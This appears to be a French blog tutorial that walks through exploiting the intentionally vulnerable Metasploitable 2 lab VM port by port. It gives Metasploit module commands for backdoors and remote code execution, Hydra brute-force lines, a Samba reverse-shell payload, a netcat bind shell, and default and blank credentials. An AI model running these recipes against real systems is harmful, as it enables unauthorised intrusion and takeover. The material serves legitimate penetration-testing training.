Metasploitable2

Metasploitable est une machine virtuelle Linux intentionnellement vulnérable.

Cette VM peut être utilisée pour effectuer des formations en sécurité, tester des outils de sécurité et pratiquer des techniques courantes de test de pénétration.

Installation et configuration

Nous sommes ici pour exploiter Metasploitable 2 (Damn vulnerable machine for penetration testing)

Getter cette machine Metasploiable2 de https://information.rapid7.com/download-metasploitable-2017.html

Processus d’installation :

  1. Ouvrir VirtualBox et cliquer sur le bouton « Nouveau » pour créer une nouvelle machine virtuelle
  2. Taper le nom de la machine virtuelle(Metasploitable2)
  3. Allocation de la quantité de mémoire(préférable mais pas inférieure à 512mb)
  4. Sélectionner Utiliser un fichier de disque dur existant
  5. Sélectionner le fichier vmdk que vous avez téléchargé depuis Rapid7
  6. Cliquer sur Créer….! !! Installation réussie de Metasploitable2, Il est maintenant temps de configurer les paramètres du réseau.

Après l’installation, changez les paramètres de l’adaptateur réseau comme suit :

Réglage en réseau : Paramètres/Réseau/Adaptateur Sélectionnez Ethernet ou Sans fil

Dans l’onglet Avancé Sélectionnez : Promiscuous Mode comme Allow All

Démarrez la machine Metasploitable2 et Essayez de vous connecter en utilisant les informations d’identification données sur Banner… ! !!

Trouver l’adresse IP de la machine en utilisant la commande suivante dans le terminal

ifconfig

C’est tout pour la configuration….Commençons à pirater…

Scanning

Scanning de la Matasploitable 2

Comme nous l’avons remarqué l’adresse IP de la machine est 192.168.0.130

Commençons le scan avec Nmap qui fait partie de Kali Linux

nmap -sV -p- 192.168.0.130

Exploitation de tous les ports dans différentes techniques :

Méthode 1:

Login avec Anonyme comme nom d’utilisateur et sans mot de passe.

Si vous avez besoin de plus d’infos sur le FTP anonyme, vous pouvez les trouver ici.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Méthode 2 :

Par la force brute en utilisant Hydra mais vous devez avoir une liste personnalisée de noms d’utilisateurs et de mots de passe.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Il va prendre chaque nom d’utilisateur et mot de passe des fichiers donnés et essayer de se connecter au service FTP cible.

Une fois que vous avez trouvé les informations d’identification, vous pouvez directement vous connecter.

Après la connexion à un compte utilisateur, vous pouvez obtenir un accès root en faisant une escalade de privilèges.

Méthode 3 :

Exploiter le FTP à travers le framework Metasploit

ouvrir la console du framework Metasploit et rechercher l’exploit vsftpd Backdoor

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

.

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Félicitations vous avez obtenu l’accès root

22-.SSH

Secure Shell (SSH) est un protocole réseau cryptographique permettant d’exploiter des services réseau de manière sécurisée sur un réseau non sécurisé.

Exploitation de SSH dans différentes techniques

Méthode 1

Craquage du nom d’utilisateur et du mot de passe avec Hydra

Hydra est un outil intégré dans Kali-Linux utilisé pour L’attaque par force brute est une méthode d’essai et d’erreur utilisée par les programmes d’application pour décoder les données cryptées telles que les mots de passe ou les clés Data Encryption Standard (DES), par un effort exhaustif (en utilisant la force brute) plutôt que d’employer des stratégies intellectuelles.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Méthode 2

Ouvrir le framework Metasploit

Ouvrir le terminal et taper ces commandes :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

régler cet auxiliaire et voir ce qu’il demande.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Définir une liste prédéfinie de noms d’utilisateurs et une liste de mots de passe

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Il prendra en fonction du temps votre liste de noms d’utilisateurs et de mots de passe et il notifiera avec nom d’utilisateur : mot de passe et se connecter avec ces informations d’identification.

ssh username@targetipaddress

Vous avez un accès utilisateur, vous ne pouvez pas effectuer toutes les tâches, alors essayez d’obtenir un accès root en faisant une escalade de privilèges.

23-TELNET

Telnet est un protocole réseau simple, basé sur le texte, qui est utilisé pour accéder à des ordinateurs distants sur des réseaux TCP/IP comme Internet. Telnet a été créé et lancé en 1969 et, historiquement parlant, on peut dire que c’était le premier Internet.

telnet <target IP Address> --> 192.168.0.130

Par défaut, il va Attraper la bannière Metasploitable 2, il montre que Connectez-vous avec msfadmin/msfadmin pour commencer. Il suffit d’entrer ces informations d’identification, vous êtes dedans.

25-SMTP

SMTP fait partie de la couche application du protocole TCP/IP. En utilisant un processus appelé « store and forward », le SMTP déplace votre courrier électronique sur et à travers les réseaux. Il travaille en étroite collaboration avec quelque chose appelé l’agent de transfert de courrier (MTA) pour envoyer votre communication au bon ordinateur et à la bonne boîte aux lettres électronique.

Méthode 1 :

Utiliser Metasploit

Démarrer le Metasploit en exécutant les commandes

service postgresql startmsfconsole -qsearch smtp_version

.

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

SMTP est l’abréviation de Simple Mail Transport Protocol et est un protocole de serveur à serveur.à serveur et conserve une base de données locale des utilisateurs auxquels il doit envoyer et recevoir des courriers électroniques.

SMTP possède un ensemble de commandes. Nous allons nous connecter à notre cible avec « netcat » à travers le port 25 et essayer d’acquérir cette base de données d’emails.

Ouvrir un nouveau terminal et taper :

nc 192.168.0.130 25

Maintenant que la connexion est établie vous pouvez vérifier par les commandes « SMTP »

Type: vrfy user

vrfy (C’est un shell noninteractive)

Pour les commandes SMTP, visitez : http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Méthode 2

Utilisation de smtp_enum

Ceci peut être fait par Metasploit

search smtp_enum

.

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Cette méthode utilise l’énumération pour trouver cette liste d’utilisateurs dans le service SMTP.

Plus tard, NetCat peut être utile pour obtenir une connexion inverse avec cet utilisateur.

139&445 Netbios-SSN

Samba est un projet open-source qui est largement utilisé sur les ordinateurs Linux et Unix afin qu’ils puissent travailler avec les services de fichiers et d’impression de Windows.

Nous pouvons même utiliser Samba comme un serveur actif pour gérer la connexion, l’authentification et le contrôle d’accès pour un réseau Windows.

Recherche d’exploit

use exploit/multi/samba/usermap_script

.

Pour visualiser les options de l’exploit

show optionsSet RHOST192.168.0.130 (Target IP address)

.

Définir la charge utile

Show payloadsSet payload cmd/unix/reverse

Définir les arguments requis pour la charge utile

.

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Vérification une fois que tous les arguments requis sont remplis

exploit

1099-Java-.RMI

L’invocation de méthode à distance (RMI) est une API qui permet à un objet d’invoquer une méthode sur un objet qui existe dans un autre espace d’adressage, qui pourrait être sur la même machine ou sur une machine distante.

Exploitation de java-RMI-server

Recherche de l’exploit

search java_rmi_server

Choisissez l’exploit en fonction de leur rang. par exemple, « excellent » fonctionne mieux que « normal ».

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Nous avons obtenu l’accès à la machine cible.

1524-BINDSHELL

Le shell de liaison est un type de shell dans lequel la machine cible ouvre un port de communication ou un écouteur sur la machine victime et attend une connexion entrante. L’attaquant se connecte alors à l’écouteur de la machine victime qui conduit ensuite à l’exécution de code ou de commande sur le serveur.

Exploitation

C’est un shell root donc on peut se connecter via le service netcat.

nc <target ip address> 1524

Congratulations, Vous êtes un utilisateur root maintenant.

2121-ProFTPD

Avant d’exploiter ce port, vous devez avoir des identifiants de connexion donc comme nous le savons la méthode l’obtenir par la technique de la force brute, Nous pouvons accéder à ProFTPd avec telnet, Nous utilisons ici l’utilisateur : user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

C’est un utilisateur normal, Essayez l’escalade de privilège pour obtenir le contrôle root.

3306-MYSQL

Méthode 1 :

Recherche de l’exploit

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

.

Il y a parfois une chance d’avoir un mot de passe vide pour MySQL. Nous pouvons donc l’exploiter directement.

Note : par défaut, il affiche BLANK_PASSWORDS comme faux, mettez-le à vrai.

set BLANK_PASSWORDS as true

Méthode:2

Dans cette méthode, nous allons exploiter MySQL en utilisant cette commande en fournissant le nom d’utilisateur comme root et l’IP de la cible.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc est un outil permettant d’accélérer la compilation du code source en utilisant le calcul distribué sur un réseau informatique. Avec la bonne configuration

distcc peut réduire considérablement le temps de compilation d’un projet

Exploitation du port 3632 en utilisant distcc-.exec

Ouvrir la msfconsole et rechercher distcc_exec

search distcc_execshow options

Définir les arguments requis pour l’exploitation

set RHOSTS <target-ip>exploit

Nous avons obtenu un accès Shell…Essayez de faire une escalade de privilège pour un privilège plus élevé

Exploitation de PostgreSQL avec postgre_payload

Ouvrir msfconsole & chercher postgres_payload

.

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Définir les arguments requis pour l’exploit

set RHOSTS <target-ip>

Par défaut, il utilisera le nom d’utilisateur postgres

exploit

Successivement connecté à postgresql…Obtenons un shell pour faire plus de choses…

Tentative d’escalade de privilèges…Bon apprentissage.. !!!

5900-VNC

Ouvrir msfconsole et chercher l’exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
.

Cette méthode est utilisée pour exploiter un logiciel VNC hébergé sur des systèmes d’exploitation Linux ou Unix ou Windows avec une vulnérabilité d’authentification.

Tenter de se connecter vnc avec ce mot de passe

Ouvrir la visionneuse Vnc dans le Terminal &Taper l’adresse IP et se connecter

une invite de connexion apparaît. et demande de fournir des informations d’identification

Puis entrez le mot de passe et cliquez sur OK.

Voilaaa… !!! vous avez l’accès…Je sais ce que vous pensez en ce moment…Ne déconnez pas avec les choses autour..Happy Learning.

6000-X11

Le système X Window (alias X) est un système de fenêtrage pour les affichages bitmap, qui est commun sur les systèmes d’exploitation basés sur UNIX. X fournit le cadre de base pour un environnement basé sur une interface graphique.

Le serveur X11 distant accepte les connexions de n’importe quel endroit où l’on peut obtenir une connexion Internet. Il est responsable de l’accès aux cartes graphiques, aux périphériques d’entrée et à l’écran d’affichage de l’un ou l’autre ordinateur ou périphérique sans fil.

Exploitation du port 6000 en utilisant ssh

ssh -X -l msfadmin 192.168.0.122

Dans la commande ci-dessus, ‘X’ active tous les transferts de ports, en fournissant le nom d’utilisateur et l’IP de la cible nous donne le shell

6667 & 6697 UnrealIRCD

UnrealIRCd est un serveur IRC Open Source, au service de milliers de réseaux depuis 1999. Il fonctionne sous Linux, OS X et Windows

UnrealIRCd est un IRCd très avancé avec un fort accent sur la modularité, un fichier de configuration avancé et hautement configurable. Les principales fonctionnalités incluent SSL

UnrealIRCd est l’un des démons IRC les plus populaires et les plus complets, et il est utilisé sur le plus grand nombre de serveurs IRC

Ce serveur est décrit comme ayant probablement le plus de fonctionnalités de sécurité de tout serveur IRC.

Protocoles utilisés : Internet Relay Chat

Exploitons ce serveur IRC.

Méthode 1 : sur le port 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Définissons les arguments requis pour l’exploitation

set RHOSTS <target-ip>

.

par défaut, le numéro de port 6667 est attribué à exploit

run (or) exploit

Heyyy…On a une racine… On vit sur le fil du rasoir…

Méthode 2 : Sur le port 6697

Utiliser l’exploit ci-dessus et définir les arguments requis

  • Cette fois, définir le port comme 6697
set RHOSTS <target-ip>set RPORT 6697

Et la deuxième fois aussi, nous avons eu le root…Essayez d’exploiter cela…Bon apprentissage

8180-TOMCAT

Apache Tomcat est une implémentation open-source des technologies Java Servlet, JavaServer Pages, Java Expression Language et WebSocket. Tomcat fournit un environnement de serveur web HTTP « pur Java » dans lequel le code Java peut s’exécuter.

Exploiter Apache-Tomcat

Il peut être réalisé en deux étapes :

Ouvrir la msfconsole & rechercher tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

L’exploit attribuera des listes de noms d’utilisateurs &mots de passe par défaut. Après avoir défini les arguments de l’exploit Type exploit (ou) run

run

Prendre le même nom d’utilisateur et mot de passe et le donner à l’exploit suivant.

Recherche d’exploits de gestionnaire de tomcat

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Définir RHOSTS, RPORT, et HttpPassword, HttpUsername que nous avons obtenu de l’exploit de connexion de tomcat et ensuite exécuter l’exploit.

msfconsole pourrait assigner la charge utile appropriée pour un exploit, C’est pourquoi nous avons le meterpreter…

8787-Ruby-drb

dRuby est un système d’objets distribués pour Ruby. Il est écrit en Ruby pur et utilise son protocole.

Aucun service complémentaire n’est nécessaire en dehors de ceux fournis par le runtime Ruby, comme les sockets TCP.

search drb_remote_codeexec

Définir les arguments requis pour exploiter

show optionsset RHOSTS <target-ip>exploit (or) run

Félicitations, vous avez obtenu l’accès shell root… essayez d’utiliser quelques commandes shell.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.